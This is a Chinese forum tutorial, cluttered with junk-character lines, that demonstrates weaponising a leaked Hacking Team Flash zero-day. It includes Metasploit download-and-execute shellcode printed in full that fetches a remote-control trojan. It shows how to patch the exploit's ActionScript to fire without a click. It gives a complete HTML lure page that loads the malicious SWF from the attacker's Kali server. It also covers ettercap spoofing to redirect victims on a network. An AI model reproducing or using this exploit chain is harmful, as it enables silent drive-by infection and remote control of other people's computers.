" G* j4 `! h+ ~, u
三、flash 0day之手工代码修改制作下载者实例入侵演示
9 @9 l. z& |: W / S( {) R+ R2 h
9 J' R' g; S0 Q* [: T 利用到的工具:
9 S( ]; u7 {( y5 u0 x4 ` * r; m, G% t9 O
) s- M/ z4 \3 l4 h/ `3 s& C/ V
Msf
: @3 J1 t- l6 b# M$ [6 {2 d, F# E
$ m9 Z' G2 K2 v: K0 I, d( F" Z# T% F0 q3 Q7 S5 Z( ~
Ettercap ' a8 w4 A2 m# p0 v1 g
2 c* F8 l& n0 k9 ^
9 T/ h+ _! D9 h7 A Adobe Flash CS6 - Y/ f& G' f" T" d( U- r$ [
7 l f& y6 W% R
# `7 }2 p5 a' ~3 _# J6 L5 m' P
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 6 a/ D N! M% _; V
) I, g' y3 E9 U* F
5 j7 y& n3 b/ V" i7 [, l) k 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options " n- l; S7 f7 O: w* C% v) J
; p8 o6 q5 U b7 W
" r, k* _: G, ?' t" n 如图:
* H$ u/ Y4 ^: D 6 C4 j _1 G' w# M! A0 o
: s1 L# c+ t" j" h, N: {2 t
t l2 Q3 u5 T& _2 } ( j+ q) j1 a. R4 G, Z# m
# F/ D$ s8 ?& Y! r5 H
) t7 O, g, F2 x- c6 K1 t8 ^' M" l
1 a3 m5 _5 L7 r2 s
. d: u; b. |) F1 U$ [9 A 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' t0 ~# y: ]- Z/ u
! G4 ^% x% x) a" B/ X% g
8 b7 R2 c7 E" H1 m
' V; Q* l5 e l$ b2 t t9 B 9 G& l, c1 d$ `) J- p
; N9 \" J. e! [, u% t
+ U4 \3 u7 E4 c3 C8 I) n) K6 Z ) g2 W. @! b2 ?# E3 ?
5 _4 q5 y9 K& m* a0 @. k" s9 s
然后执行generate -t dword生成shellcode,如下: 3 {- U4 G6 a$ D) H3 [" ~! I! k
! e Q+ u7 {8 V; N# A6 ^9 g1 W9 Z+ l
2 t/ F! x9 q+ U9 B" \+ } ) o1 {: f" p8 K( w
2 d- o c6 p+ D8 i& ]
! H+ D# ]5 B7 M- v3 y 复制代码到文本下便于我们一会编辑flash exp,如下:
- I# |$ P- Z- R- |' g
6 }. J+ L' U+ O
& ^9 F' P5 B0 o3 q; d( r 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
/ \/ d3 D" c& H, t) J! o . W* O/ k2 ~5 F- p8 L
6 Z b: i! h1 d; o' @. L
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
. F- }3 }6 Z) X5 d0 Q- Z8 X' q: n * K7 |! i, S; S. b
/ p$ A3 z y2 c" y" _ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, - L$ h% r- b! p7 g4 I2 j
- @8 S# i+ A6 Q! p
; l+ s! W, Z0 i: {) }, J& @ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 M1 @0 D' [" d2 j& N9 `
: Q& j: g5 P5 V" t1 J* l1 N0 n' D& @9 x, _
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ; y1 O9 V, Q) t3 y
: r+ k9 P. \- y+ W' y( t; F! [% Y& Q
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
" A' v$ Q: G- |- X" l
! k, _, V8 {! y! [
% x. Y) X. k, }& `. d$ p 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
0 F( Q% {% k7 V2 e: q- f
7 p/ _, c; R( Q8 g! w2 K% ]- c
, u5 t& V; g n1 }; \" g 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ; H8 k1 t* f! q% o" e, _8 m) Q5 w
! O0 d" c& Z! G0 W
& T& ^( o7 n$ c7 Y' ]
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
/ H% A. W# P! ~ 7 S7 s+ x" X8 [
* ~; h, [, U- h: U 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
/ K. C8 {3 `3 L! z
1 r0 Q7 L( |) c/ W6 N0 Z$ k4 v
0 _2 `0 A0 ^; w+ h; t1 m! ~% M 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
+ t- T; {9 E" K) M ?; X9 n! T" z
0 f6 m R& }. {
# w; A: x# k R6 [, u 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ) K+ y3 c' g: _; S- s4 _& q
* ?4 w+ W/ I% J c7 R1 ^
1 f9 R& @' z* A* _$ ~! T/ n 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
6 E6 p; D$ l1 b8 }" Y) P
: z" p( D3 ^- L W) m$ B9 g
: g5 d- W$ ~8 ]# ~) u9 }# Y! t& K _ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 6 Y" r- E; B9 }. N# S
# ^: G7 L4 F: L) V( E9 a+ \+ y& [7 w5 L7 D
4 Z8 l- b' }7 n) t" G7 y
& }, B5 `0 ~3 E% f d. S% A8 `3 W- Y' N1 c4 P# p% s$ I% C k
# a4 a7 U+ V; W4 q( v, S 8 Y2 m9 I2 m- O! X5 A
' F- a v. l6 a$ Q- W7 W7 D 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
9 \6 F8 L2 f& l, }6 l! l
( a! X& K/ }! |9 @3 [( g7 ^# e' X# [: K7 X) |' h' y7 D% D
6 }4 p4 O! b. v0 b7 l. w2 a
1 l) i8 l5 m& z" U0 I4 L1 A% I
' n8 P8 Y( N7 O) k7 _ 先修改ShellWin32.as,部分源代码如图:
1 f) [8 i4 S6 t/ B/ R( ] $ A; h1 }) X; i8 G
4 W! Z% O; o8 z Z. ^( |- O" g
3 d& j& p! q- y: k. o 9 I- l4 U, @7 C; `5 e3 C4 t* i
+ g3 r% f( N" N 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
! w0 L. r; I% B* J# T
0 F; h; e+ L4 L0 R Q7 A+ c8 v9 b! w& S9 H: z ~
X3 {+ a8 B+ _; d% w4 U* v' G0 `
6 d2 p- ~+ e2 b5 b* ?3 t; s( c
7 V! Y5 x c4 ~. Y! e' }7 ]3 D0 W 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: " [9 K! J! M3 v. Q! g
7 Z; k9 Q9 _5 \5 k1 H/ |
& W: k& h5 H" `
. N+ a9 o% f% O4 D2 W
0 _2 b1 x- r0 o/ a/ d3 g+ F! S
/ v- S7 u8 ~7 Z) @! @/ K/ w9 l
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: / M: j9 A& n0 l- G8 U# h
5 d5 R: c: e; j5 |1 Y$ J' x
; \ R4 c' M4 _$ g, G( R5 Q7 g
" R0 Y$ P6 n0 z
7 B5 j# M% W; X% _/ ?
$ v! [* W9 p# d0 b- w- O l
9 m& `& i% K- |2 ]7 J/ O2 V
+ P; K) J0 ]4 B' v' ^2 u+ F( S4 n5 `! K w3 ^
! a- w' U: W' O; C# \# _# `" Y3 F& Y$ s
% _4 ^7 b) k# z9 d0 g7 w3 c0 C& \4 K
然后点保存,下面我们来编译一下,打开
% [ M7 A( C3 H
- u# n1 o6 c) O* `, Z/ n, ]$ L } L5 r1 O: g
exp1.fla然后点文件-发布,看看编译没错误
5 N) a9 W. w: P7 e, N' ?2 D6 u ; v. ~, e0 Y* ` P
! j: e7 y2 r7 M( b' `: A6 m
) R+ z! r5 s! m
% F- i4 {; a" O. A) C c
( ^$ ^& X B( w l2 W2 B6 U8 s0 G/ a; m
# L) o' o* c( P' o, o
3 i; \+ {+ l6 d e: P: N; ^% Q0 }; M+ T9 A
- N0 H. u! M! m1 Y
! _4 C& p/ J2 P4 {# Z5 c/ h5 v; z& T3 s1 ?, J2 A* K7 H0 _
7 Q, A# \9 v/ y! ^, \7 g2 Q + r$ ?% C9 Z2 h: J+ z9 {
2 x( h7 U8 L0 ^7 `1 f0 S, r9 a 然后我们把生成的 $ c+ ]( q$ F# }4 h+ [0 ^3 @
* [. Y5 s( i* p+ U5 T( L6 o: c7 l/ m# F) \9 }. L( q0 E7 s
exp1.swf丢到kailinux 的/var/www/html下:
" g5 Q* d8 b, o4 E: ~ . a6 F* u& {4 F' s# k. E
/ I' O! u& ?4 b0 U 然后把这段代码好好编辑一下 8 N& o9 X3 r. o1 F* K% k$ E
- ^% v. y8 L: l! t
8 r" F& }2 H% z# }, [; d
0 K9 J4 O& T. A5 S# i. {. M) l+ h # f5 q# D2 C, K% q3 w
* Z! o$ U1 m7 M4 `1 |' Z) K 1 ]9 B- E- {( P( t1 U! ]4 }: o
- ?5 h2 O) d& n7 E# \% r6 ^0 P, [; u3 z7 v+ D4 f2 G! ~
$ R( N- _) m+ u5 M8 v$ ^
% `( j5 ?$ P: x
6 ?. J; C* P+ A$ N% t6 N
- u% ?: p! a7 v2 L: k* J$ \- S" p
+ U+ R3 a. k2 r$ G Q4 Z W
: h$ H+ l' ^: i% h; M: d0 N% o2 O
& L4 l; O. ^ E. Z
6 C( X' n; b ~; q/ g2 W7 ~
# |- u: }' F: M/ I5 D3 d
$ y V2 v, Q# ~ 7 \/ i4 }; b% {- G
, G7 S9 r7 C/ D7 @( l( E
<!DOCTYPE html>
- q- N" \4 w y6 F' `- i/ h8 t 5 w% e0 j& K: W: A2 u
. w7 e( r! {9 h5 l& u! }: d <html>
" y/ |1 t9 A1 J8 {/ H8 \
6 }3 Y, P) v" x% N: T
/ u3 ?2 f+ n g8 X+ L# e3 u. f <head>
/ a% {; l5 m" @9 {
6 C4 o1 {4 I5 T0 }6 N5 |( R# \9 e0 G( F4 u+ v; m8 \; n
<meta http-equiv="Content-Type" content="text/html; " K- s' K: z* Z4 U& N3 @5 f$ U, }
( W+ K5 A0 u' Z4 f5 F
; J4 a G3 h, p4 f. x9 R charset=utf-8"/> 8 @% h$ w# c+ Y
7 v" z0 M7 O- g3 w- A2 X; k% B
' R1 Y( ~; y- G9 D( K </head>
. o0 M3 W3 k, @3 k2 _$ R' W9 c # k/ c$ C# F; }: L2 ]
8 G0 b" k+ G0 z" P0 k0 [5 p6 j
<body> 9 I( `! N/ @$ f
" t- J; }7 U5 @6 w2 s T8 ~! j
0 h4 V3 }3 {/ y) K! P/ J <h2> Please wait, the requested page is loading...</h2> 5 K$ i+ V. R+ |' b# c- ~6 x( g
7 |0 k! |" j* I
1 l2 |' S" ^3 g+ J <br> % F4 I# U; J2 s4 o. w3 F
& e2 t/ H7 \3 I0 T0 W" L) Y" M$ c
- @8 K4 f1 s6 Z+ L8 a/ }' R3 D
<OBJECT
) n7 T" V' S0 X& o8 \ - ]1 c6 I" J* W! ?+ F' |
/ p, R" X* T0 m. }+ R classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie & ?1 z3 Y9 M0 S5 P' D% O9 n
1 B: j2 w3 E% f' ~& M, _* ~5 y. l. [3 U, u
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 1 ~8 e+ L- S! Q* [
/ V ]+ p! w1 n. Q7 E/ G
# Z! f L( d; W0 |! @ </body> 8 i. b9 c/ P6 N) ?. W# n/ B
9 p% z# X* |1 {: r: }
( _% u+ {% _$ d$ G <script> # F2 u2 Z; H0 V1 J" K( Z/ c! D
) g ^0 x- h1 t6 {* R3 }: I7 Q( j6 K d/ _6 x9 y
setTimeout(function () { |) n& ]1 E$ c r' O. I
/ B I* X" W8 e! O
q) ~8 x' O% Q l
7 n' g! ^* G0 u ~2 N $ }- y; t2 h4 |8 k6 W2 E
5 ?; ?0 t# t9 z) L2 ~ window.location.reload(); 1 _) @" E J+ T& p! }. u
/ `0 J' M! Z3 C' d% P
; b, z- j" x& ?7 P+ B }, 10000);
' m9 b. a0 R9 p8 `% O6 D0 J
% d+ C3 I5 e% l& n8 z* x+ v1 @1 G) z5 N- C! @) D! T
& P' y8 A j: Y
. i6 j9 E8 `& y- d
, B+ Z/ i/ {1 E8 N7 f6 P </script> ! j& W( Z# G1 T- f! [
7 B3 l' e( W& N2 t+ G" D5 ^# u$ _9 R- l6 [
</html>
# o( {1 \) e5 T* v * I9 [2 \3 o6 ]: e8 o
# B3 ~% m% a- \ 9 C" `3 a. b: i9 C. M( d
5 z7 n. C$ m7 n! h6 n+ b6 y3 _6 R1 Z8 D7 I* G' s# ]
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 7 _3 K& d- L1 S) G4 X" Q
$ b% G# B- }" F* W; e& y0 Y! p
2 @% W1 A; ?# Z4 F1 _+ T
( |6 S$ P" F9 S# |2 W1 K% b% @
, P$ q* } N' X$ I7 L5 a7 K! l5 T4 f/ E( A+ o0 {. m
2 n+ ^4 d; R9 T4 l# n" D
$ ~( Y8 h" C% C- {) Y: t
: r4 O+ c4 l% d$ w% o 4 l& U& M3 \) `4 Y2 m! u
4 m8 Y. l# |0 ~* |9 U2 _2 j0 {8 G5 `' q2 {. K; G5 h% _4 u
6 w: e' W+ x6 O. }8 L
9 I1 f/ O$ Q. z& e" H" u% @( k
1 N( C% B2 G/ k$ _/ y9 I$ } 8 q9 S- Q" P' N
; _( x. y. n' a& n4 z6 g G: y( }+ t# e* l
下面我们用ettercap欺骗如图: ) x7 w- r$ }/ x2 n5 s# {+ n9 M" m
# c6 @$ W: _* P* u$ v! n) c
4 Q O8 E+ v+ i4 @$ s; G* T' R
- H+ T, j7 ` G ! I0 l" G% _7 o, @
/ m5 t" C6 l, w4 R' H; J% t
- r5 W! o, o3 {+ w* l% I! {) x
# n* r& P9 x) v" R' X) C, {
3 M* x4 E0 z+ Y+ {' M/ l! x
下面我们随便访问个网站看看: 4 H9 n6 Q5 n( P
( k9 U+ `% `6 w5 n S) l
$ Y5 S9 T/ u+ i! d. z" T+ ~ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 t3 I6 W7 {) H% j1 Q' ?
" {4 h6 r- C8 ^ j! s; q# {5 v% p: E" |2 v' `
2 `5 d m, m5 q0 _
6 Y1 t$ s7 F4 ^' n6 ~& V% s; O
% E! n: k" _# c- r 我们看另一台,
2 C1 Q T! C2 s/ A r; b; P/ v ' p8 ?5 ]# I# E" z2 C5 p2 N
! Y A0 n/ x* M; R 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
& }# k" f( y2 L |